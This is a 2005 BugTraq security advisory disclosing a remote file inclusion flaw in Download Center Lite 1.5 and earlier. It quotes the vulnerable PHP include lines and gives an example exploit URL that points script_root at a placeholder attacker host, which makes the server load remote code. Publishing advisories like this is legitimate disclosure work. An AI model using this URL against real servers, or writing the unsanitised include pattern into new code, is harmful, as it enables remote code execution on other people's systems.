BugTraq
Download Center Lite (DCL) - Arbitrary File Inclusion (VXSfx) Mar 04 2005 05:01PM
Filip Groszynski (groszynskif gmail com)


-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Name: Download Center Lite (DCL)
Version: <= 1.5 (free/commercial)
Homepage: http://www.stadtaus.com/

Author: Filip Groszynski (VXSfx)
Date: 4 March 2005
-- == -- == -- == -- == -- == -- == -- == -- == -- == --

Vulnerable code in inc/download_center_lite.inc.php:

...
/*****************************************************
** Include some files
*****************************************************/
include($script_root . 'inc/functions.inc.php');
include($script_root . 'inc/template.class.inc.php');
include($script_root . 'inc/log_downloads.class.inc.php');
include($script_root . 'languages/language.' . $language . '.inc.php');
...

--------------------------------------------------------

Example:

if register_globals=on and allow_url_fopen=on:
http://[victim]/[dir]/inc/download_center_lite.inc.php?script_root=http:
//[hacker_box]/

--------------------------------------------------------

Fix and Vendor status:

Vendor has been notified.

--------------------------------------------------------

Contact:

Author: Filip Groszynski <VXSfx>
Location: Poland <Warsaw>
Email: groszynskif <at> gmail <dot> com
HP: http://shell.homeunix.org

-- == -- == -- == -- == -- == -- == -- == -- == -- == --

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus